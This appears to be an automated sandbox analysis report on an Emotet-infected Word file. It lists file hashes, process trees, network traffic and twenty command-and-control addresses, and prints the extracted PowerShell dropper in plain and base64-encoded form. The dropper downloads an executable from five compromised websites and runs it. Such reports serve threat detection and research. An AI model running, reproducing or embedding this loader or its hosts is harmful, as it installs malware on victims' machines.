Analysis

  • max time kernel
    58s
  • max time network
    65s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    17-07-2020 20:12

General

  • Target

    0df5c512f9cae0cc043d8f969a770b3083214c46d9a51a71a9c36b128d69eb89.doc

  • Size

    191KB

  • MD5

    ab90f80aca8f45bc67ac29acf47184a1

  • SHA1

    f9d314711608d6b8ba4781235bfcaab74d1c2017

  • SHA256

    0df5c512f9cae0cc043d8f969a770b3083214c46d9a51a71a9c36b128d69eb89

  • SHA512

    c3718ea54f8113cc17364a11ea9aa315a67dd821d8204157af7811fae7feb227eb212d4f5cd50e629b8e2ef6a58edb9de5f16273941d15a601e494a784646c9d

Malware Config

Extracted

Language
ps1
Source
1
$noug='maultoezveukrioxbewxij';[Net.ServicePointManager]::"seCur`iTy`P`ROto`COl" = 'tls12, tls11, tls';$jaothpaoth = '870';$louqu='booyweejnealkeov';$dubkeokpip=$env:userprofile+'\'+$jaothpaoth+'.exe';$toaxnoirfietsounsiqu='xoequnool';$cuathcioy=&('new-ob'+'je'+'ct') net.WEbClIENT;$ceexthauchheif='https://www.20190607.com/wp-admin/ixyjozs/*https://lovely-lollies.com/wp-admin/fgvid/*https://www.angage.com/wp-content/mtincvc/*https://connect-plus.co.uk/aspnet_client/3yey3rr/*http://mapas.hoonicorns.pt/comp3/ly8cmti/'."SpL`it"([char]42);$quihjoufjeeploofmeov='loithmaichjoofnaet';foreach($yeeynoobniokgiohxurzaip in $ceexthauchheif){try{$cuathcioy."DoWN`lO`ADFILe"($yeeynoobniokgiohxurzaip, $dubkeokpip);$raequhuaxliajjeik='mew';If ((.('Ge'+'t-I'+'tem') $dubkeokpip)."Leng`TH" -ge 26887) {([wmiclass]'win32_Process')."cRe`AtE"($dubkeokpip);$siechietchuancoildeechtuach='thoun';break;$kuucpeadfeogdaezseuj='sakniorguzriognuuzcoth'}}catch{}}$heufrookriajtheulcieb='ziaqucoexthiezmuuc'
URLs
exe.dropper

https://www.20190607.com/wp-admin/ixyjozs/

exe.dropper

https://lovely-lollies.com/wp-admin/fgvid/

exe.dropper

https://www.angage.com/wp-content/mtincvc/

exe.dropper

https://connect-plus.co.uk/aspnet_client/3yey3rr/

exe.dropper

http://mapas.hoonicorns.pt/comp3/ly8cmti/

Extracted

Family

emotet

C2

109.117.53.230:443

212.51.142.238:8080

190.160.53.126:80

139.59.60.244:8080

91.211.88.52:7080

190.108.228.62:443

186.208.123.210:443

46.105.131.87:80

173.91.22.41:80

222.214.218.37:4143

31.31.77.83:443

62.75.141.82:80

93.156.165.186:80

93.51.50.171:8080

185.94.252.104:443

78.189.165.52:8080

95.179.229.244:8080

73.11.153.178:8080

203.153.216.189:7080

95.213.236.64:8080

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS
3
Q0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS
4
fkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB
5
-----END PUBLIC KEY-----
6

Signatures

  • Blacklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies registry class 280 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0df5c512f9cae0cc043d8f969a770b3083214c46d9a51a71a9c36b128d69eb89.doc"
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:1100
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABuAG8AdQBnAD0AJwBtAGEAdQBsAHQAbwBlAHoAdgBlAHUAawByAGkAbwB4AGIAZQB3AHgAaQBqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAcgBgAGkAVAB5AGAAUABgAFIATwB0AG8AYABDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAGoAYQBvAHQAaABwAGEAbwB0AGgAIAA9ACAAJwA4ADcAMAAnADsAJABsAG8AdQBxAHUAPQAnAGIAbwBvAHkAdwBlAGUAagBuAGUAYQBsAGsAZQBvAHYAJwA7ACQAZAB1AGIAawBlAG8AawBwAGkAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAagBhAG8AdABoAHAAYQBvAHQAaAArACcALgBlAHgAZQAnADsAJAB0AG8AYQB4AG4AbwBpAHIAZgBpAGUAdABzAG8AdQBuAHMAaQBxAHUAPQAnAHgAbwBlAHEAdQBuAG8AbwBsACcAOwAkAGMAdQBhAHQAaABjAGkAbwB5AD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABuAGUAdAAuAFcARQBiAEMAbABJAEUATgBUADsAJABjAGUAZQB4AHQAaABhAHUAYwBoAGgAZQBpAGYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuADIAMAAxADkAMAA2ADAANwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaQB4AHkAagBvAHoAcwAvACoAaAB0AHQAcABzADoALwAvAGwAbwB2AGUAbAB5AC0AbABvAGwAbABpAGUAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZgBnAHYAaQBkAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAG4AZwBhAGcAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG0AdABpAG4AYwB2AGMALwAqAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0AC0AcABsAHUAcwAuAGMAbwAuAHUAawAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwAzAHkAZQB5ADMAcgByAC8AKgBoAHQAdABwADoALwAvAG0AYQBwAGEAcwAuAGgAbwBvAG4AaQBjAG8AcgBuAHMALgBwAHQALwBjAG8AbQBwADMALwBsAHkAOABjAG0AdABpAC8AJwAuACIAUwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABxAHUAaQBoAGoAbwB1AGYAagBlAGUAcABsAG8AbwBmAG0AZQBvAHYAPQAnAGwAbwBpAHQAaABtAGEAaQBjAGgAagBvAG8AZgBuAGEAZQB0ACcAOwBmAG8AcgBlAGEAYwBoACgAJAB5AGUAZQB5AG4AbwBvAGIAbgBpAG8AawBnAGkAbwBoAHgAdQByAHoAYQBpAHAAIABpAG4AIAAkAGMAZQBlAHgAdABoAGEAdQBjAGgAaABlAGkAZgApAHsAdAByAHkAewAkAGMAdQBhAHQAaABjAGkAbwB5AC4AIgBEAG8AVwBOAGAAbABPAGAAQQBEAEYASQBMAGUAIgAoACQAeQBlAGUAeQBuAG8AbwBiAG4AaQBvAGsAZwBpAG8AaAB4AHUAcgB6AGEAaQBwACwAIAAkAGQAdQBiAGsAZQBvAGsAcABpAHAAKQA7ACQAcgBhAGUAcQB1AGgAdQBhAHgAbABpAGEAagBqAGUAaQBrAD0AJwBtAGUAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAGQAdQBiAGsAZQBvAGsAcABpAHAAKQAuACIATABlAG4AZwBgAFQASAAiACAALQBnAGUAIAAyADYAOAA4ADcAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAUgBlAGAAQQB0AEUAIgAoACQAZAB1AGIAawBlAG8AawBwAGkAcAApADsAJABzAGkAZQBjAGgAaQBlAHQAYwBoAHUAYQBuAGMAbwBpAGwAZABlAGUAYwBoAHQAdQBhAGMAaAA9ACcAdABoAG8AdQBuACcAOwBiAHIAZQBhAGsAOwAkAGsAdQB1AGMAcABlAGEAZABmAGUAbwBnAGQAYQBlAHoAcwBlAHUAagA9ACcAcwBhAGsAbgBpAG8AcgBnAHUAegByAGkAbwBnAG4AdQB1AHoAYwBvAHQAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABoAGUAdQBmAHIAbwBvAGsAcgBpAGEAagB0AGgAZQB1AGwAYwBpAGUAYgA9ACcAegBpAGEAcQB1AGMAbwBlAHgAdABoAGkAZQB6AG0AdQB1AGMAJwA=
    1⤵
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    PID:1060
  • C:\Users\Admin\870.exe
    C:\Users\Admin\870.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Windows\SysWOW64\NlsLexicons0045\psbase.exe
      "C:\Windows\SysWOW64\NlsLexicons0045\psbase.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      PID:288

Network

  • flag-unknown
    DNS
    www.20190607.com
    Remote address:
    8.8.8.8:53
    Request
    www.20190607.com
    IN A
    Response
    www.20190607.com
    IN A
    129.226.70.136
  • flag-unknown
    GET
    https://www.20190607.com/wp-admin/ixyjozs/
    powersheLL.exe
    Remote address:
    129.226.70.136:443
    Request
    GET /wp-admin/ixyjozs/ HTTP/1.1
    Host: www.20190607.com
    Connection: Keep-Alive
  • flag-unknown
    DNS
    apps.identrust.com
    Remote address:
    8.8.8.8:53
    Request
    apps.identrust.com
    IN A
    Response
    apps.identrust.com
    IN CNAME
    apps.digsigtrust.com
    apps.digsigtrust.com
    IN A
    192.35.177.64
  • flag-unknown
    GET
    http://apps.identrust.com/roots/dstrootcax3.p7c
    powersheLL.exe
    Remote address:
    192.35.177.64:80
    Request
    GET /roots/dstrootcax3.p7c HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: apps.identrust.com
    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 Jul 2020 21:41:58 GMT
    Server: Apache
    X-XSS-Protection: 1; mode=block
    Strict-Transport-Security: max-age=15768000
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' *.identrust.com
    Cache-control: max-age=86400
    Last-Modified: Thu, 13 Feb 2020 15:25:43 GMT
    ETag: "37d-59e76b3c64bc0"
    Accept-Ranges: bytes
    Content-Length: 893
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Keep-Alive: timeout=5, max=100
    Content-Type: application/pkcs7-mime
  • flag-unknown
    DNS
    www.download.windowsupdate.com
    Remote address:
    8.8.8.8:53
    Request
    www.download.windowsupdate.com
    IN A
    Response
    www.download.windowsupdate.com
    IN CNAME
    wu-fg-shim.trafficmanager.net
    wu-fg-shim.trafficmanager.net
    IN CNAME
    2-01-3cf7-0009.cdx.cedexis.net
    2-01-3cf7-0009.cdx.cedexis.net
    IN CNAME
    cds.d2s7q6s2.hwcdn.net
    cds.d2s7q6s2.hwcdn.net
    IN A
    205.185.216.42
    cds.d2s7q6s2.hwcdn.net
    IN A
    205.185.216.10
  • flag-unknown
    GET
    http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    powersheLL.exe
    Remote address:
    205.185.216.42:80
    Request
    GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
    Cache-Control: max-age = 3600
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Tue, 21 Apr 2020 00:50:26 GMT
    If-None-Match: "03582d87617d61:0"
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: www.download.windowsupdate.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jul 2020 20:12:25 GMT
    Connection: Keep-Alive
    Cache-Control: public, max-age=3600
    Content-Length: 58367
    Content-Type: application/vnd.ms-cab-compressed
    Last-Modified: Sat, 13 Jun 2020 20:53:32 GMT
    Accept-Ranges: bytes
    ETag: "06e9cb2c441d61:0"
    X-HW: 1595016745.dop153.am5.t,1595016745.cds131.am5.c
    X-CCC: NL
    X-CID: 9
  • flag-unknown
    DNS
    dns.msftncsi.com
    Remote address:
    8.8.8.8:53
    Request
    dns.msftncsi.com
    IN A
    Response
    dns.msftncsi.com
    IN A
    131.107.255.255
  • flag-unknown
    DNS
    dns.msftncsi.com
    Remote address:
    8.8.8.8:53
    Request
    dns.msftncsi.com
    IN AAAA
    Response
    dns.msftncsi.com
    IN AAAA
    fd3e:4f5a:5b81::1
  • 129.226.70.136:443
    https://www.20190607.com/wp-admin/ixyjozs/
    tls, http
    powersheLL.exe
    6.3kB
    295.7kB
    124
    206

    HTTP Request

    GET https://www.20190607.com/wp-admin/ixyjozs/
  • 192.35.177.64:80
    http://apps.identrust.com/roots/dstrootcax3.p7c
    http
    powersheLL.exe
    369 B
    1.6kB
    5
    3

    HTTP Request

    GET http://apps.identrust.com/roots/dstrootcax3.p7c

    HTTP Response

    200
  • 205.185.216.42:80
    http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    http
    powersheLL.exe
    1.5kB
    60.5kB
    26
    45

    HTTP Request

    GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab

    HTTP Response

    200
  • 109.117.53.230:443
    psbase.exe
    152 B
    3
  • 109.117.53.230:443
    psbase.exe
    104 B
    2
  • 224.0.0.252:5355
    100 B
    2
  • 10.7.0.255:137
    netbios-ns
    468 B
    6
  • 8.8.8.8:53
    www.20190607.com
    dns
    62 B
    78 B
    1
    1

    DNS Request

    www.20190607.com

    DNS Response

    129.226.70.136

  • 8.8.8.8:53
    apps.identrust.com
    dns
    64 B
    111 B
    1
    1

    DNS Request

    apps.identrust.com

    DNS Response

    192.35.177.64

  • 8.8.8.8:53
    www.download.windowsupdate.com
    dns
    76 B
    225 B
    1
    1

    DNS Request

    www.download.windowsupdate.com

    DNS Response

    205.185.216.42
    205.185.216.10

  • 224.0.0.252:5355
    100 B
    2
  • 239.255.255.250:1900
    966 B
    6
  • 239.255.255.250:1900
  • 8.8.8.8:53
    dns.msftncsi.com
    dns
    62 B
    78 B
    1
    1

    DNS Request

    dns.msftncsi.com

    DNS Response

    131.107.255.255

  • 8.8.8.8:53
    dns.msftncsi.com
    dns
    62 B
    90 B
    1
    1

    DNS Request

    dns.msftncsi.com

    DNS Response

    fd3e:4f5a:5b81::1

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/288-13-0x00000000003E0000-0x00000000003EC000-memory.dmp

    Filesize

    48KB

  • memory/1100-2-0x0000000008A30000-0x0000000008A34000-memory.dmp

    Filesize

    16KB

  • memory/1100-3-0x0000000006F00000-0x0000000007100000-memory.dmp

    Filesize

    2.0MB

  • memory/1100-4-0x0000000006F00000-0x0000000007100000-memory.dmp

    Filesize

    2.0MB

  • memory/1100-5-0x000000000B0A0000-0x000000000B0A4000-memory.dmp

    Filesize

    16KB

  • memory/1100-6-0x000000000C120000-0x000000000C124000-memory.dmp

    Filesize

    16KB

  • memory/1100-7-0x0000000006F00000-0x0000000007100000-memory.dmp

    Filesize

    2.0MB

  • memory/1716-10-0x00000000002E0000-0x00000000002EC000-memory.dmp

    Filesize

    48KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.